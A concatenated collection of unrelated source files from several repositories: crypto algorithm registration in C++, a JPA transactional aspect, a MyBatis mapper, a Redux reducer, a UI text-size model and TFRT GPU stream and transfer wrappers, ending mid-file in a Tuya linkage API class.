addSignatureAlgorithm(&SignatureAlgorithm::SHA224withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA224, sha224Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA256withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA256, sha256Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA384withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA384, sha384Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA512withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA512, sha512Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA1, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha1Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA224, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha224Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA256, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha256Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA384, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha384Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA512, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha512Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA1, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha1Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA224, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha224Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA256, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha256Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA384, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha384Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA512, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha512Factory));
addKeyFactoryAlgorithm(&KeyFactoryAlgorithm::Pkcs8PrivateKey, std::make_unique<mbedcrypto::MbedcryptoPKCS8KeyFactoryFactory>(this));
addKeyFactoryAlgorithm(&KeyFactoryAlgorithm::X509PublicKey, std::make_unique<mbedcrypto::MbedcryptoPKCS8KeyFactoryFactory>(this));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::RSA, std::make_unique<mbedcrypto::MbedcryptoRSAKeyPairGeneratorFactory>(this));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp192r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP192R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp192k1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP192K1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp256r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp256k1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256K1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_prime256v1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp384r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP384R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp521r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP521R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp256r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp384r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP384R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp512r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP512R1));
}
} // namespace jcp
|
LesNovell/helix-parent
|
helix-jpa/src/main/java/io/helixservice/feature/jpa/transaction/TransactionalAspect.java
|
/*
* @author <NAME>
*
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
*/
package io.helixservice.feature.jpa.transaction;
import co.paralleluniverse.fibers.SuspendExecution;
import io.helixservice.feature.jpa.JpaHibernateFeature;
import org.aspectj.lang.ProceedingJoinPoint;
import org.aspectj.lang.Signature;
import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import javax.persistence.EntityTransaction;
import javax.persistence.PersistenceContext;
import javax.transaction.Transactional;
import java.lang.reflect.Field;
import java.util.EmptyStackException;
/**
 * AspectJ aspect implementing support for the {@code @Transactional} annotation.
 *
 * <p>Public methods annotated with {@link Transactional} (only
 * {@code TxType.REQUIRED} is supported) are wrapped in a JPA transaction: an
 * {@link EntityManager} is created (or reused from {@link EntityManagerStack}
 * for nested transactional calls) and injected into the target's EntityManager
 * field; the transaction is committed or rolled back when the outermost
 * transactional method completes.
 */
@Aspect
public class TransactionalAspect {
    private static final Logger LOG = LoggerFactory.getLogger(TransactionalAspect.class);

    public TransactionalAspect() {
    }

    /*
     * Instruments all public methods with @Transactional annotation
     */
    @SuppressWarnings("DuplicateThrows")
    @Around(value = "(execution(public * *(..)) && @annotation(transactional))"
            + " || (execution(public * *(..)) && within(@javax.transaction.Transactional *) && @annotation(transactional))")
    public Object around(ProceedingJoinPoint pjp, Transactional transactional) throws Throwable, SuspendExecution {
        Object result;
        Signature method = pjp.getSignature();
        Object target = pjp.getTarget();
        LOG.info("Managing transaction for method=" + method.getName() +
                ", target=" + target.getClass().getName() + ", txType=" + transactional.value());
        validateTransactionalAnnotation(target, method, transactional);
        boolean commit = false;
        String persistenceContextName = beginTransaction(target);
        try {
            result = pjp.proceed();
            commit = true;
        } catch (Throwable t) {
            // Rethrow after deciding commit/rollback from the annotation's
            // rollbackOn/dontRollbackOn lists.
            commit = shouldCommitOnThrowable(transactional, t);
            LOG.info("Caught throwable=" + t.getClass().getName() + ", which results in commit=" + commit);
            throw t;
        } finally {
            // The transaction is always ended, whether the method returned or threw.
            // (The previous trace message here wrongly claimed the method was
            // being skipped as non-transactional.)
            LOG.trace("Ending transaction for method=" + method.getName() + ", target=" + target.getClass().getName());
            endTransaction(persistenceContextName, commit);
        }
        return result;
    }

    /**
     * Rejects any transaction type other than REQUIRED, which is the only one
     * this aspect implements.
     */
    private void validateTransactionalAnnotation(Object target, Signature method, Transactional transactional) {
        if (transactional.value() != Transactional.TxType.REQUIRED) {
            String msg = "Transaction type not supported: txType=" + transactional.value() + ", method=" + method.getName() + ", target=" + target
                    .getClass().getName();
            LOG.error(msg);
            throw new IllegalArgumentException(msg);
        }
    }

    /**
     * Decides whether the transaction should commit despite the thrown
     * throwable: dontRollbackOn wins over rollbackOn; otherwise only
     * RuntimeExceptions trigger rollback (JTA default).
     */
    private boolean shouldCommitOnThrowable(Transactional transactional, Throwable t) {
        for (Class<?> dontRollbackClass : transactional.dontRollbackOn()) {
            if (dontRollbackClass.isAssignableFrom(t.getClass())) {
                return true;
            }
        }
        for (Class<?> rollbackClass : transactional.rollbackOn()) {
            if (rollbackClass.isAssignableFrom(t.getClass())) {
                return false;
            }
        }
        return RuntimeException.class.isAssignableFrom(t.getClass());
    }

    /**
     * Starts (or joins) a transaction for the target object: resolves the
     * persistence unit, pushes an EntityManager on the per-unit stack and
     * injects a delegate into the target's EntityManager field.
     *
     * @return the persistence unit name the transaction was started on
     */
    private String beginTransaction(Object target) throws Throwable {
        String persistenceUnitName;
        try {
            Field entityManagerField = findEntityManagerField(target);
            persistenceUnitName = findPersistenceUnitName(target, entityManagerField);
            LOG.info("Beginning transaction on " + persistenceUnitName);
            EntityManager entityManager = createEntityManager(persistenceUnitName);
            EntityManagerStack.push(persistenceUnitName, entityManager);
            entityManagerField.set(target, new EntityManagerDelegate(persistenceUnitName));
        } catch (Throwable t) {
            String message = "Unable to begin transaction on entity manager in targetClass=" + target.getClass().getName();
            LOG.error(message, t);
            throw new IllegalStateException(message, t);
        }
        return persistenceUnitName;
    }

    /**
     * Creates a new EntityManager and begins a transaction when this is the
     * outermost transactional call; otherwise reuses the one already on the
     * stack (nested calls join the existing transaction).
     */
    private EntityManager createEntityManager(String persistenceUnitName) {
        EntityManager entityManager;
        if (EntityManagerStack.isEmpty(persistenceUnitName)) {
            EntityManagerFactory entityManagerFactory = JpaHibernateFeature.entityManagerFactoryByPersistenceUnitName(persistenceUnitName);
            entityManager = entityManagerFactory.createEntityManager();
            LOG.info("Created entityManager=" + emIdentifier(entityManager) + " on threadName=" + Thread.currentThread().getName());
            entityManager.getTransaction().begin();
            LOG.info("Started transaction on entityManager=" + emIdentifier(entityManager));
        } else {
            entityManager = EntityManagerStack.peek(persistenceUnitName);
        }
        return entityManager;
    }

    /**
     * Locates the EntityManager field declared on the target's class and makes
     * it accessible.
     * NOTE(review): if several EntityManager fields exist, the last declared
     * one wins (original behavior, preserved); inherited fields are not
     * searched — confirm that is acceptable.
     */
    private Field findEntityManagerField(Object target) throws IllegalAccessException {
        Field result = null;
        Class<?> targetClass = target.getClass();
        for (Field field : targetClass.getDeclaredFields()) {
            if (field.getType().equals(EntityManager.class)) {
                field.setAccessible(true);
                result = field;
            }
        }
        if (result == null) {
            String message = "EntityManager field missing on targetClass=" + targetClass.getName();
            LOG.error(message);
            throw new IllegalStateException(message);
        }
        return result;
    }

    /**
     * Resolves the persistence unit name from a @PersistenceContext annotation
     * on the field (preferred) or the class, falling back to the default unit.
     */
    private String findPersistenceUnitName(Object target, Field entityManagerField) {
        String persistenceUnitName = JpaHibernateFeature.DEFAULT_PERSISTENCE_UNIT_NAME;
        PersistenceContext persistenceContext = entityManagerField.getDeclaredAnnotation(PersistenceContext.class);
        if (persistenceContext == null) {
            persistenceContext = target.getClass().getAnnotation(PersistenceContext.class);
        }
        // BUGFIX: annotation String attributes default to "" (never null), so the
        // previous "name() != null" check was always true and an annotation
        // without unitName overrode the default with the empty string.
        if (persistenceContext != null && !persistenceContext.unitName().isEmpty()) {
            persistenceUnitName = persistenceContext.unitName();
        }
        return persistenceUnitName;
    }

    /**
     * Pops the EntityManager for the unit; when this was the outermost call,
     * commits (unless rollback-only) or rolls back and closes the manager.
     * For nested calls, only marks rollback-only when commit == false.
     */
    private void endTransaction(String persistenceUnitName, boolean commit) {
        LOG.info("Ending transaction on " + persistenceUnitName);
        EntityManager entityManager;
        try {
            entityManager = EntityManagerStack.pop(persistenceUnitName);
        } catch (EmptyStackException e) {
            throw new IllegalStateException("endTransaction() failed => EntityManagerStack is empty", e);
        }
        if (EntityManagerStack.isEmpty(persistenceUnitName)) {
            try {
                if (commit && !entityManager.getTransaction().getRollbackOnly()) {
                    entityManager.getTransaction().commit();
                    LOG.info("Transaction committed on entityManager=" + emIdentifier(entityManager));
                } else {
                    entityManager.getTransaction().rollback();
                    LOG.info("Transaction rolled back on entityManager=" + emIdentifier(entityManager));
                }
            } finally {
                safelyCloseEntityManager(entityManager);
            }
        } else {
            if (!commit) {
                LOG.info("Transaction marked for rollback only on entityManager=" + emIdentifier(entityManager));
                entityManager.getTransaction().setRollbackOnly();
            }
        }
    }

    /**
     * Closes the EntityManager, first rolling back any transaction still
     * active; never propagates exceptions from cleanup.
     */
    private void safelyCloseEntityManager(EntityManager entityManager) {
        try {
            LOG.trace("Closing entityManager=" + emIdentifier(entityManager));
            try {
                EntityTransaction transaction = entityManager.getTransaction();
                if (transaction != null && transaction.isActive()) {
                    transaction.rollback();
                }
            } finally {
                entityManager.close();
            }
        } catch (Throwable unexpected) {
            // Cleanup must not mask the original outcome; log and swallow.
            LOG.error("Unexpected exception closing the entity manager", unexpected);
        }
    }

    /** Short hex identity string for log correlation of EntityManager instances. */
    private String emIdentifier(EntityManager entityManager) {
        return Integer.toHexString(entityManager.hashCode());
    }
}
|
wkkisme/heroland-competition-parent
|
dao/src/main/java/com/heroland/competition/dal/mapper/HeroLandQuestionRecordDetailMapper.java
|
<gh_stars>0
package com.heroland.competition.dal.mapper;
import com.heroland.competition.dal.pojo.HeroLandQuestionRecordDetail;
import com.heroland.competition.dal.pojo.HeroLandQuestionRecordDetailExample;
import java.util.List;
import org.apache.ibatis.annotations.Param;
/**
 * MyBatis mapper for question record detail rows.  Follows the standard
 * MyBatis-generator Example pattern; SQL lives in the corresponding mapper XML.
 */
public interface HeroLandQuestionRecordDetailMapper {
    /** Counts rows matching the example filter. */
    long countByExample(HeroLandQuestionRecordDetailExample example);
    /** Deletes rows matching the example filter; returns affected row count. */
    int deleteByExample(HeroLandQuestionRecordDetailExample example);
    /** Deletes the row with the given primary key; returns affected row count. */
    int deleteByPrimaryKey(Long id);
    /** Inserts a full record (all columns); returns affected row count. */
    int insert(HeroLandQuestionRecordDetail record);
    /** Inserts only the non-null fields of the record; returns affected row count. */
    int insertSelective(HeroLandQuestionRecordDetail record);
    /** Returns all rows matching the example filter. */
    List<HeroLandQuestionRecordDetail> selectByExample(HeroLandQuestionRecordDetailExample example);
    /** Returns the row with the given primary key, or null if absent. */
    HeroLandQuestionRecordDetail selectByPrimaryKey(Long id);
    /** Updates non-null fields of rows matching the example; returns affected row count. */
    int updateByExampleSelective(@Param("record") HeroLandQuestionRecordDetail record, @Param("example") HeroLandQuestionRecordDetailExample example);
    /** Updates all fields of rows matching the example; returns affected row count. */
    int updateByExample(@Param("record") HeroLandQuestionRecordDetail record, @Param("example") HeroLandQuestionRecordDetailExample example);
    /** Updates non-null fields of the row with the record's primary key. */
    int updateByPrimaryKeySelective(HeroLandQuestionRecordDetail record);
    /** Updates all fields of the row with the record's primary key. */
    int updateByPrimaryKey(HeroLandQuestionRecordDetail record);
    /**
     * Counts correct answers for a question within a topic.
     * NOTE(review): the third argument is bound to SQL parameter "userId" while
     * its Java name is excludeUserId — check the mapper XML to confirm whether
     * this user is excluded from or matched by the count.
     */
    int countCorrectAnswer(@Param("topicId") String topicId, @Param("questionId") Long questionId, @Param("userId") String excludeUserId);
}
|
yuhualingfeng/docs-webpack
|
webpack3/src/redux/reducers1.js
|
<gh_stars>0
/**
 * Reducer for the left-menu visibility flag.
 *
 * @param {boolean} state  current visibility (defaults to true on init)
 * @param {{type: string, leftMenuShowState?: boolean}} action
 * @returns {boolean} the new visibility state
 */
function setLeftMenuShowState(state = true, action) {
    // BUGFIX: use strict equality; loose `==` allows accidental
    // type-coerced matches on action.type.
    if (action.type === 'leftMenuShowState') {
        return action.leftMenuShowState;
    }
    return state;
}

export default {
    setLeftMenuShowState
};
|
MJaroslav/IHateGUI
|
api/src/main/java/com/github/mjaroslav/ihategui/api/model/TextSize.java
|
<reponame>MJaroslav/IHateGUI<filename>api/src/main/java/com/github/mjaroslav/ihategui/api/model/TextSize.java
package com.github.mjaroslav.ihategui.api.model;
import com.github.mjaroslav.ihategui.util.ParsingHelper;
import com.github.mjaroslav.ihategui.util.StringUtils;
import lombok.*;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
@EqualsAndHashCode
@ToString
@NoArgsConstructor(access = AccessLevel.PRIVATE)
/**
 * Text size value that can be a default marker, a constant (e.g. "12") or a
 * percentage; the interpretation is derived from the raw string via
 * {@link Type#of(String)}.  Instances are created with {@link #of(String)}.
 */
public final class TextSize {
    // Presumably the size used by consumers when isDefault() — TODO confirm at call sites.
    public static final int DEFAULT_SIZE = 10;
    // How the raw 'value' string should be interpreted.
    @NotNull
    private Type type = Type.DEFAULT;
    // Raw size string; initialized to the DEFAULT type's name ("DEFAULT").
    @NotNull
    private String value = type.toString();

    /** @return true if no explicit size was set. */
    public boolean isDefault() {
        return type == Type.DEFAULT;
    }

    /** @return true if the value is an absolute number (parse with asConstant()). */
    public boolean isConstant() {
        return type == Type.CONSTANT;
    }

    /** @return true if the value is a percentage (parse with asPercent()). */
    public boolean isPercent() {
        return type == Type.PERCENT;
    }

    /** Parses the value as an integer constant; only valid when isConstant(). */
    public int asConstant() {
        return Integer.parseInt(value);
    }

    /**
     * Parses the value as a percentage; only valid when isPercent().
     * Assumes StringUtils.sub(value, -1) strips a trailing suffix character
     * (presumably '%') — TODO confirm against StringUtils.
     */
    public float asPercent() {
        return Float.parseFloat(StringUtils.sub(value, -1));
    }

    /** Replaces the raw value and re-derives its interpretation type. */
    public void set(@NotNull String value) {
        type = Type.of(value);
        this.value = value;
    }

    /** Static factory: builds a TextSize from a raw string. */
    @NotNull
    public static TextSize of(@NotNull String value) {
        val result = new TextSize();
        result.set(value);
        return result;
    }

    /** Interpretation of the raw value string. */
    public enum Type {
        DEFAULT, CONSTANT, PERCENT;

        /** Classifies a raw string; null or unrecognized input handling is
         *  delegated to ParsingHelper.parseTextAndNumericEnum. */
        @NotNull
        public static Type of(@Nullable String value) {
            return ParsingHelper.parseTextAndNumericEnum(value, DEFAULT, CONSTANT, PERCENT, Type::valueOf);
        }
    }
}
|
maxpearl/hypha
|
hypha/static_src/src/app/src/common/containers/FormContainer/models.js
|
<reponame>maxpearl/hypha
import * as Immutable from 'seamless-immutable';
// Initial immutable state for one form instance: field values, validation
// errors, validation constraints and a submit-readiness flag.
export const formInitialState = Immutable.from({
    values: {},
    errors: {},
    constraints: {},
    readyToSubmit: false
});

// Root state for the forms container — presumably keyed by form id; confirm
// against the reducer that populates `forms`.
const initialState = Immutable.from({
    forms: {}
});

export default initialState;
|
Dig-Doug/runtime
|
backends/gpu/lib/system/system.cc
|
<gh_stars>0
// Copyright 2021 The TensorFlow Runtime Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Implement a few thin wrapper for GPU APIs.
#include "tfrt/gpu/system/system.h"
#include "tfrt/bef_executor/bef_file.h"
#include "tfrt/gpu/gpu_types.h"
#include "tfrt/gpu/wrapper/wrapper.h"
#include "tfrt/host_context/async_dispatch.h"
#include "tfrt/host_context/async_value_ref.h"
#include "tfrt/host_context/chain.h"
#include "tfrt/host_context/diagnostic.h"
#include "tfrt/host_context/execution_context.h"
#include "tfrt/host_context/function.h"
#include "tfrt/host_context/host_context.h"
#include "tfrt/support/error_util.h"
namespace tfrt {
namespace gpu {
// Takes ownership of the BEF buffer, opens it as a BEF file using the host's
// kernel registry/diagnostics/allocator, and resolves 'function_name' inside
// it.  The opened file and resolved function are cached on the instance.
Program::Program(BefBuffer&& file_buffer, llvm::StringRef function_name,
                 HostContext* host)
    : file_buffer_(std::move(file_buffer)) {
  bef_file_ = tfrt::BEFFile::Open(file_buffer_, host->GetKernelRegistry(),
                                  host->diag_handler(), host->allocator());
  // A null bef_file_ would make the GetFunction call below crash; caught in
  // debug builds only.
  assert(bef_file_);
  function_ = bef_file_->GetFunction(function_name);
}
/*static*/
// Initializes the GPU wrapper layer for 'platform' and returns a ready System,
// or an error AsyncValueRef if wrapper initialization fails.
// NOTE(review): the 'prefix' parameter is unused here — confirm whether it is
// still required by the interface.
AsyncValueRef<System> System::Initialize(wrapper::Platform platform,
                                         llvm::StringRef prefix,
                                         HostContext* host) {
  if (auto error = wrapper::Init(platform))
    return tfrt::MakeErrorAsyncValueRef(host, DecodedDiagnostic(error));
  return Instantiate(host);
}
/*static*/
// Builds an immediately-available System value on the given host without any
// platform initialization (use Initialize() when the wrapper layer also needs
// to be set up).
AsyncValueRef<System> System::Instantiate(HostContext* host) {
  System system{};
  return MakeAvailableAsyncValueRef<System>(host, std::move(system));
}
// Creates a non-blocking GPU stream on the device with the given ordinal.
// Each failure along the way (device lookup, context creation, making the
// context current, stream creation) is surfaced as an error AsyncValueRef.
// NOTE(review): the platform is hard-coded to CUDA here even though
// Initialize() accepts a platform parameter — confirm this is intentional.
AsyncValueRef<GpuStream> System::CreateStream(ExecutionContext& exec_ctx,
                                              int gpu_ordinal) {
  // NOTE(fishx): Right now we create a new context for each GPU stream.
  // TODO(tfrt-devs): Find a way to reuse the same context for multiple stream.
  auto device = wrapper::DeviceGet(wrapper::Platform::CUDA, gpu_ordinal);
  if (!device) {
    return MakeErrorAsyncValueRef(exec_ctx.host(),
                                  DecodedDiagnostic(device.takeError()));
  }
  auto context = wrapper::CtxCreate(wrapper::CtxFlags::SCHED_AUTO, *device);
  if (!context) {
    return MakeErrorAsyncValueRef(exec_ctx.host(),
                                  DecodedDiagnostic(context.takeError()));
  }
  auto current = wrapper::CtxSetCurrent(context->get());
  if (!current) {
    return MakeErrorAsyncValueRef(exec_ctx.host(),
                                  DecodedDiagnostic(current.takeError()));
  }
  auto stream =
      wrapper::StreamCreate(*current, wrapper::StreamFlags::NON_BLOCKING);
  if (!stream) {
    return MakeErrorAsyncValueRef(exec_ctx.host(),
                                  DecodedDiagnostic(stream.takeError()));
  }
  // The stream keeps the context alive by holding an AsyncValueRef to it.
  auto gpu_context = MakeAvailableAsyncValueRef<GpuContext>(
      exec_ctx.host(), std::move(*context));
  return tfrt::MakeAvailableAsyncValueRef<tfrt::gpu::GpuStream>(
      exec_ctx.host(), std::move(gpu_context), std::move(*stream));
}
// Returns a default GPU allocator bound to the context of the given stream.
AsyncValueRef<GpuAllocator> System::CreateAllocator(
    ExecutionContext& exec_ctx, AsyncValueRef<GpuStream> stream) {
  auto* host = exec_ctx.host();
  return MakeAvailableAsyncValueRef<GpuDefaultAllocator>(host,
                                                         stream->gpu_context());
}
// Allocates 'size' bytes via the given allocator on the given stream and
// returns the buffer, or an error AsyncValueRef on allocation failure.
AsyncValueRef<GpuBuffer> System::Allocate(ExecutionContext& exec_ctx,
                                          AsyncValueRef<GpuStream> stream,
                                          AsyncValueRef<GpuAllocator> allocator,
                                          size_t size) {
  auto buffer_or =
      GpuBuffer::Allocate(std::move(allocator), size, stream->get());
  if (!buffer_or) {
    return MakeErrorAsyncValueRef(exec_ctx.host(),
                                  DecodedDiagnostic(buffer_or.takeError()));
  }
  return MakeAvailableAsyncValueRef<GpuBuffer>(exec_ctx.host(),
                                               std::move(*buffer_or));
}
// Asynchronously copies host memory 'src' into device buffer 'dst' on
// 'stream' once both 'dst' and 'chain' become available.  Returns a chain
// that is fulfilled when the copy has been *enqueued* on the stream (no
// device-side completion event is recorded here, unlike TransferFromDevice).
AsyncValueRef<Chain> System::TransferToDevice(ExecutionContext& exec_ctx,
                                              AsyncValueRef<GpuStream> stream,
                                              AsyncValueRef<GpuBuffer> dst,
                                              ArrayRef<uint8_t> src,
                                              AsyncValueRef<Chain> chain) {
  auto out_chain = MakeUnconstructedAsyncValueRef<Chain>(exec_ctx.host());
  RunWhenReady({dst.GetAsyncValue(), chain.GetAsyncValue()},
               [stream = std::move(stream), dst = std::move(dst), src,
                chain = std::move(chain), out_chain = out_chain.CopyRef()] {
                 // Propagate upstream errors before touching the device.
                 if (dst.IsError()) return out_chain.SetError(dst.GetError());
                 if (chain.IsError())
                   return out_chain.SetError(chain.GetError());
                 // Refuse to overrun the destination buffer.
                 if (dst->size() < src.size()) {
                   return out_chain.SetError(tfrt::StrCat(
                       "TransferToDevice failed: "
                       "destination buffer size (",
                       dst->size(), ") is less than number of bytes to copy (",
                       src.size(), ")"));
                 }
                 auto current = wrapper::CtxSetCurrent(stream->context());
                 if (!current) return out_chain.SetError(current.takeError());
                 if (auto error = wrapper::MemcpyAsync(
                         *current, dst->pointer(),
                         wrapper::Pointer<const void>(
                             static_cast<const void*>(src.data()),
                             wrapper::Platform::CUDA),
                         src.size(), stream->get()))
                   return out_chain.SetError(error);
                 out_chain.emplace();
               });
  return out_chain;
}
// Asynchronously copies device buffer 'src' into host memory 'dst' on
// 'stream' once both 'src' and 'chain' become available.  A GPU event is
// recorded after the memcpy and synchronized on the blocking work queue, so
// the returned chain is fulfilled only when the host buffer actually holds
// the data (contrast with TransferToDevice, which completes on enqueue).
AsyncValueRef<Chain> System::TransferFromDevice(ExecutionContext& exec_ctx,
                                                AsyncValueRef<GpuStream> stream,
                                                MutableArrayRef<uint8_t> dst,
                                                AsyncValueRef<GpuBuffer> src,
                                                AsyncValueRef<Chain> chain) {
  auto out_chain = MakeUnconstructedAsyncValueRef<Chain>(exec_ctx.host());
  RunWhenReady(
      {src.GetAsyncValue(), chain.GetAsyncValue()},
      [exec_ctx, stream = std::move(stream), dst = std::move(dst),
       src = std::move(src), chain = std::move(chain),
       out_chain = out_chain.CopyRef()] {
        // Propagate upstream errors before touching the device.
        if (src.IsError()) return out_chain.SetError(src.GetError());
        if (chain.IsError()) return out_chain.SetError(chain.GetError());
        // Refuse to overrun the host-side destination.
        if (dst.size() < src->size()) {
          return out_chain.SetError(tfrt::StrCat(
              "TransferFromDevice failed: "
              "destination buffer size (",
              dst.size(), ") is less than number of bytes to copy (",
              src->size(), ")"));
        }
        auto current = wrapper::CtxSetCurrent(stream->context());
        if (!current) return out_chain.SetError(current.takeError());
        if (auto error = wrapper::MemcpyAsync(
                *current,
                wrapper::Pointer<void>(static_cast<void*>(dst.data()),
                                       wrapper::Platform::CUDA),
                src->pointer(), src->size(), stream->get()))
          return out_chain.SetError(error);
        // At this point, memcpy has been scheduled on the stream. However, the
        // dst buffer is not ready yet. We need to insert a gpu event to notify
        // the host when the memcpy is finished.
        auto event =
            wrapper::EventCreate(*current, wrapper::EventFlags::DISABLE_TIMING);
        if (!event) return out_chain.SetError(event.takeError());
        // Record the event on the stream.
        if (auto error = wrapper::EventRecord(event->get(), stream->get()))
          return out_chain.SetError(error);
        // EventSynchronize needs to be scheduled in the blocking work queue
        // because it will block caller thread until the event is completed.
        auto enqueued = EnqueueBlockingWork(
            exec_ctx,
            [event = std::move(*event), out_chain = out_chain.CopyRef()] {
              if (auto error = wrapper::EventSynchronize(event.get()))
                return out_chain.SetError(error);
              out_chain.emplace();
            });
        if (!enqueued) {
          return out_chain.SetError(
              "TransferFromDevice failed: failed to enqueue blocking work");
        }
      });
  return out_chain;
}
// Executes the program's lowered BEF function.  The function's expected
// signature is {chain, stream, ...inputs, ...outputs} -> chain; this method
// packs the arguments in that order, checks the arity, and returns the
// function's single chain result.
// NOTE(review): unlike the other error paths in this file, the two
// MakeErrorAsyncValueRef calls below pass no host — confirm that overload
// exists and behaves as intended.
AsyncValueRef<Chain> System::Execute(ExecutionContext& exec_ctx,
                                     Program& program,
                                     AsyncValueRef<GpuStream> stream,
                                     ArrayRef<AsyncValueRef<GpuBuffer>> inputs,
                                     ArrayRef<AsyncValueRef<GpuBuffer>> outputs,
                                     AsyncValueRef<Chain> chain) {
  const Function* fn = program.GetFunction();
  if (fn->num_results() != 1) {
    return MakeErrorAsyncValueRef(
        "Failed to execute lowered function: expected one result");
  }
  auto num_args = fn->num_arguments();
  // Lowering pass for HLO will generate BEF Function with the following
  // signature: {chain, stream, ...inputs, ...outputs} -> chain
  // So we need to prepare and check the arguments first.
  SmallVector<AsyncValue*, 8> args;
  args.reserve(num_args);
  args.push_back(chain.GetAsyncValue());
  args.push_back(stream.GetAsyncValue());
  for (auto& input : inputs) {
    args.push_back(input.GetAsyncValue());
  }
  for (auto& output : outputs) {
    args.push_back(output.GetAsyncValue());
  }
  if (args.size() != num_args) {
    return MakeErrorAsyncValueRef(
        StrCat("Failed to execute lowered function: argument size mismatch: ",
               args.size(), " v.s. ", num_args));
  }
  tfrt::RCReference<tfrt::AsyncValue> result;
  fn->Execute(exec_ctx, args, {result});
  return AsyncValueRef<Chain>(std::move(result));
}
} // namespace gpu
} // namespace tfrt
|
tuya/tuya-lighting-open-api-sdk-java
|
src/main/java/com/tuya/lighting/open/api/service/smart/linkage/LinkageApi.java
|
<gh_stars>0
package com.tuya.lighting.open.api.service.smart.linkage;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.TypeReference;
import com.tuya.lighting.open.api.config.OpenApiUrlConstants;
import com.tuya.lighting.open.api.domain.BaseResponse;
import com.tuya.lighting.open.api.domain.smart.linkage.*;
import com.tuya.lighting.open.api.utils.HttpClientUtils;
import java.util.List;
/**
 * LinkageApi
 *
 * <p>HTTP client for the smart linkage/schedule endpoints. Every public method
